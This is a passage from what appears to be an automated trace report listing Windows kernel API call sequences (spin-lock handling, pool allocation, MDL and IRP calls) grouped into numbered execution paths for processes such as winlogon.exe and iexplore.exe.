| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c7, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77e010 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000cfc, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00035626c18, Object_out = 0xffffe0003aeb99c0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003aeb99c0, ret_val_ptr_out = 0x7fff |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x28, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af83eb0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b16dc, SpinLock_unk_out = 0xffffe0003a7b16dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b16dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b16dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
Execution Path #102 (length: 18, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 18 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002af4bef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1c8, SpinLock_unk_out = 0xfffff800fc55c1c8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1c8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1c8 |
| KeSetTimer | Timer_unk = 0xfffff800fc55c130, DueTime_unk = 0x0, Dpc_unk = 0xfffff800fc55c170, Timer_unk_out = 0xfffff800fc55c130, ret_val_out = 0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1c8, SpinLock_unk_out = 0xfffff800fc55c1c8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1c8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1c8 |
| KeSetTimer | Timer_unk = 0xfffff800fc55c130, DueTime_unk = 0x0, Dpc_unk = 0xfffff800fc55c170, Timer_unk_out = 0xfffff800fc55c130, ret_val_out = 0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #105 (length: 26, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 26 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b8d6ef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #108 (length: 14, count: 26, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 14 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 26 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b491560, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002be4ce38 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x648, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a773010 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a7730f4, Length = 0x560, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae8ba10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae8ba10, MemoryDescriptorList_unk_out = 0xffffe0003ae8ba10 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #109 (length: 22, count: 17, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 22 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 17 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002be4de38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7881bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae8ba10 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a773010, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #126 (length: 9, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 9 |
Processes
»
| Process | Count |
|---|---|
| Process 42 (iexplore.exe, PID: 556) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
Execution Path #127 (length: 50, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 50 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c5a7e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003e5f5550 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003e5f5550, MemoryDescriptorList_unk_out = 0xffffe0003e5f5550 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c831cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c831cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
